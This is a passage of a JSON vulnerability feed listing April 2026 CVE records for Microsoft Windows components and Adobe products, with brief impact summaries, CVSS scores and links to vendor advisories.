network.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32151"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32152","summary":"Use after free in 
Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32152"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32153","summary":"Use after free in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32153"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32091","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Microsoft Brokering File System allows an unauthorized attacker to elevate privileges locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32091"],"published_time":"2026-04-14T18:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32093","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges 
locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32093"],"published_time":"2026-04-14T18:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32149","summary":"Improper input validation in Windows Hyper-V allows an authorized attacker to execute code locally.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32149"],"published_time":"2026-04-14T18:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32088","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Biometric Service allows an unauthorized attacker to bypass a security feature with a physical attack.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32088"],"published_time":"2026-04-14T18:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32089","summary":"Use after free in Windows Speech Brokered Api allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32089"],"published_time":"2026-04-14T18:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32090","summary":"Concurrent execution using shared resource with improper synchronization 
('race condition') in Windows Speech Brokered Api allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32090"],"published_time":"2026-04-14T18:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32085","summary":"Exposure of sensitive information to an unauthorized actor in Windows Remote Procedure Call allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32085"],"published_time":"2026-04-14T18:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32086","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32086"],"published_time":"2026-04-14T18:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32087","summary":"Heap-based buffer overflow in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges 
locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32087"],"published_time":"2026-04-14T18:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32082","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SSDP Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32082"],"published_time":"2026-04-14T18:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32083","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SSDP Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32083"],"published_time":"2026-04-14T18:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32084","summary":"Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information 
locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32084"],"published_time":"2026-04-14T18:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32078","summary":"Use after free in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32078"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32079","summary":"Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32079"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32080","summary":"Use after free in Windows WalletService allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32080"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32081","summary":"Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose 
information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32081"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32076","summary":"Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32076"],"published_time":"2026-04-14T18:17:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32077","summary":"Untrusted pointer dereference in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32077"],"published_time":"2026-04-14T18:17:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32073","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32073"],"published_time":"2026-04-14T18:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32074","summary":"Double free in Windows Projected File System allows an authorized attacker to elevate 
privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32074"],"published_time":"2026-04-14T18:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32075","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32075"],"published_time":"2026-04-14T18:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32070","summary":"Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32070"],"published_time":"2026-04-14T18:17:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32071","summary":"Null pointer dereference in Windows Local Security Authority Subsystem Service (LSASS) allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32071"],"published_time":"2026-04-14T18:17:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32072","summary":"Improper authentication in Windows Active Directory allows an unauthorized 
attacker to perform spoofing locally.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32072"],"published_time":"2026-04-14T18:17:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27931","summary":"Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27931"],"published_time":"2026-04-14T18:17:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32068","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SSDP Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32068"],"published_time":"2026-04-14T18:17:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32069","summary":"Double free in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32069"],"published_time":"2026-04-14T18:17:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27928","summary":"Improper input validation in Windows Hello allows an unauthorized attacker 
to bypass a security feature over a network.","cvss":8.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27928"],"published_time":"2026-04-14T18:17:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27929","summary":"Time-of-check time-of-use (toctou) race condition in Windows LUAFV allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27929"],"published_time":"2026-04-14T18:17:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27930","summary":"Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27930"],"published_time":"2026-04-14T18:17:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27924","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27924"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27925","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an unauthorized attacker to disclose 
information over an adjacent network.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27925"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27926","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27926"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27927","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27927"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27922","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges 
locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27922"],"published_time":"2026-04-14T18:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27923","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27923"],"published_time":"2026-04-14T18:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27919","summary":"Untrusted pointer dereference in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27919"],"published_time":"2026-04-14T18:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27920","summary":"Untrusted pointer dereference in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27920"],"published_time":"2026-04-14T18:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27921","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in 
Windows TCP/IP allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27921"],"published_time":"2026-04-14T18:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27917","summary":"Use after free in Windows WFP NDIS Lightweight Filter Driver (wfplwfs.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27917"],"published_time":"2026-04-14T18:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27918","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Shell allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27918"],"published_time":"2026-04-14T18:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27914","summary":"Improper access control in Microsoft Management Console allows an authorized attacker to elevate privileges 
locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27914"],"published_time":"2026-04-14T18:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27915","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27915"],"published_time":"2026-04-14T18:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27916","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27916"],"published_time":"2026-04-14T18:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27911","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows User Interface Core allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27911"],"published_time":"2026-04-14T18:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27912","summary":"Improper authorization in Windows Kerberos 
allows an authorized attacker to elevate privileges over an adjacent network.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27912"],"published_time":"2026-04-14T18:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27913","summary":"Improper input validation in Windows BitLocker allows an unauthorized attacker to bypass a security feature locally.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27913"],"published_time":"2026-04-14T18:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27907","summary":"Integer underflow (wrap or wraparound) in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27907"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27908","summary":"Use after free in Windows TDI Translation Driver (tdx.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27908"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27909","summary":"Use after free in Microsoft Windows Search 
Component allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27909"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27910","summary":"Improper handling of insufficient permissions or privileges in Windows Installer allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27910"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27246","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27258","summary":"DNG SDK versions 1.7.1 2502 and earlier are affected by an out-of-bounds write vulnerability that could lead to application denial-of-service. An attacker could leverage this vulnerability to corrupt memory, causing the application to crash or become unresponsive. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/dng-sdk/apsb26-41.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27288","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27303","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. 
Scope is changed.","cvss":9.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27906","summary":"Improper input validation in Windows Hello allows an authorized attacker to bypass a security feature locally.","cvss":4.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27906"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26183","summary":"Improper access control in Windows RPC API allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26183"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26184","summary":"Buffer over-read in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26184"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27243","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. 
